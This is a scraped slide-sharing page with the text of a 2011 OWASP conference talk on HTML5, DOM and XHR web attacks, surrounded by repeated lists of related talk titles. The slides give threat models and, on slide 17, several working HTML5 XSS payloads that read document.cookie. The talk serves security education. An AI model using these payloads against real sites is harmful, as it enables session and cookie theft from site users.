JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM Manipulations
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOM
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answers
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JS
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tips
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know Existed
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS Concepts
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
Shreeraj Shah
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
owaspindia
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
ClubHack
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
James Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
James Pearce
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
James Pearce
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
James Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
James Pearce
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
guest66dc5f
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
James Pearce
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
ukdpe
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
Helen
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
Helen
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profile
elenarys
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profile
moseskhedi
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web Apps
James Pearce
 
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Microsoft Developer Network (MSDN) - Belgium and Luxembourg
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Shreeraj Shah
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) (20)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profile
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profile
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web Apps
 
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
Shreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
Shreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
Shreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
Hiike
 
AWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptxAWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptx
HarisZaheer8
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStrDeep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
saastr
 
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing InstancesEnergy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Alpen-Adria-Universität
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Tatiana Kojar
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Jeffrey Haguewood
 
Operating System Used by Users in day-to-day life.pptx
Operating System Used by Users in day-to-day life.pptxOperating System Used by Users in day-to-day life.pptx
Operating System Used by Users in day-to-day life.pptx
Pravash Chandra Das
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
Dinusha Kumarasiri
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 

Recently uploaded (20)

System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
 
AWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptxAWS Cloud Cost Optimization Presentation.pptx
AWS Cloud Cost Optimization Presentation.pptx
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStrDeep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
 
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing InstancesEnergy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
 
Operating System Used by Users in day-to-day life.pptx
Operating System Used by Users in day-to-day life.pptxOperating System Used by Users in day-to-day life.pptx
Operating System Used by Users in day-to-day life.pptx
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

  • 1. Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP 22nd Sept. 2011 OWASP AppSec USA 2011 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. http://shreeraj.blogspot.com shreeraj@blueinfy.com Who Am I? http://www.blueinfy.com Founder & Director Blueinfy Solutions Pvt. Ltd. SecurityExposure.com Past experience Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking OWASP 2
  • 3. Agenda Next Generation Application’s Attack Surface and Threat Model HTML 5 – Tags, Storage & WebSQL DOM – Vulnerabilities & Exploits Abusing Sockets, XHR & CSRF ClickJacking & Exploting Rich HTML Components Reverse Engineering across DOM OWASP 3
  • 5. Real Life Cases Last three years – several application reviewed (Banking, Trading, Portals, Web 2.0 sites etc…) Interesting outcomes and stats Auto scanning is becoming increasingly difficult and impossible in some cases Sites are vulnerable and easily exploitable in many cases OWASP 5
  • 6. Technology Shift & Trend • Android • iPhone/Pad • HTML 5 Other • • Storage • Flash Mobile • AMF • WebSocket • DOM • WebSQL • JS • Storage• Flex • XHR • XAML Server side Components • Silverlight • WCF Presentation Layer • NET Business Layer Client side Data Access Layer Components Authentication (Browser) Communication etc. Runtime, Platform, Operating System Components OWASP 6
  • 7. Browser Model Mobile HTML5 Silverlight Flash Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Storage XHR WebSocket Plug-in Sockets Browser Native Network Services Network & Access Same Origin Policy (SOP) Sandbox Core Policies OWASP 7 7
  • 8. Layers Presentation HTML5 Silverlight Flash/Flex Process & Logic JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. Network & Access XHR – Level 2 WebSockets Plugin-Sockets Core Policies SOP Sandboxing for iframe Shared Resources OWASP 8
  • 9. Application Architecture Trading Weather Ajax Email RIA (Flash) Banking HTML / JS / DOM End Client Browser Blog Stack Internet Internet Web Services Web Server Data-access Application Server Database Auth. Access Authentication Server OWASP 9
  • 10. Attack Surface Expansion JSON/XML streams POST name HTTP Response and value pairs variables XML/JSON QueryString etc. Ajax RIA (Flash) HTTP variables Cookie etc. DOM calls/events HTML / JS / DOM File attachments uploads etc. API - streams Open APIs and Feeds and other integrated streams party information OWASP 1 10 0
  • 11. AppSec dynamics Source - OWASP OWASP 11 11
  • 12. Integration and Communications DOM glues everything – It integrates Flex, Silverlight and HTML if needed Various ways to communicate – native browser way, using XHR and WebSockets Options for data sharing – JSON, XML, WCF, AMF etc. (many more) Browsers are supporting new set of technologies and exposing the surface OWASP 12
  • 13. Demos App using DOM, AJAX and Web Services HTML 5 components and usage Fingerprinting Application Assets from DOM or JavaScripts Frameworks, Scripts, Structures, and so on – DWR/Struts OWASP 13
  • 14. Threat Model Sandbox attacks 7 1 XSS abuse with 8 Abusing new features and ClickJacking tags and attributes like drag-and-drop Events Tags & Attributes Thick Features Presentation Injecting and Exploiting WebSQL WebSQL DOM Storage 4 3 Stealing from 2 DOM based XSS the storage Parser/Threads Process & Logic and Redirects 5 XHR WebSocket Plug-in Sockets Abusing network Network API and Sockets Browser Native Network Services & Access CSRF 6 Core across streams Same Origin Policy (SOP) Sandbox Policies 9 Threats to widgets Botnet/Spynet using 10 OWASP WebWorkers 14 and mashups
  • 15. Mapping top 10 – Current Context A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL. A2 – XSS : DOM based XSS, Script injection through , Direct third party streams, HTML5 tags A3 – Broken Authentication and Session Management: Reverse Engineering Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage A4 – Insecure Direct Object Referencing : Insecure Data Access Level calls from browser. A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing) A6 – Security Misconfiguration : Insecure browsers, poor policies, trust model A7 – Failure to restrict URL Access : Hidden URL and resource-fetching from reverse engineering A8 – Unvalidated Redirects : DOM-based redirects and spoofing A9 – Insecure Crypto Storage : Local storage inside browser and Global variables A10 – Insufficient Transport Layer Protection : Ajax and other calls going over non-SSL channels. Mobile 10 … OWASP 15
  • 16. HTML 5 – TAGS, STORAGE & WEBSQL OWASP 1 16 6
  • 17. Abusing HTML 5 Tags Various new tags and can be abused, may not be filtered or validated Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> OWASP 17
  • 18. Attacking Storage HTML 5 is having local storage and can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 18
  • 19. Attacking Storage It is possible to steal them through XSS or via JavaScript getItem and setItem calls XSS the box and scan through storage OWASP 19
  • 20. DOM Storage Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 20
  • 21. What is wrong? OWASP 21
  • 22. By default its Global Here is the line of code temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function() OWASP 22
  • 23. DOM stealing It is possible to get these variables and clear text information – user/pass Responses and tokens Business information XHR calls and HTTP request/responses Dummy XHR object injection Lot of possibilities for exploitation OWASP 23
  • 24. Demo DOMTracer and profiling Accessing username and password OWASP 24
  • 25. SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 25
  • 26. SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 26
  • 27. DOM – VULNERABILITIES & EXPLOITS OWASP 27
  • 28. DOM Architecture OWASP 28
  • 29. DOM Calls Ajax/Flash/Silverlight – Async Calls HTML / CSS / RIA Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) OWASP 29
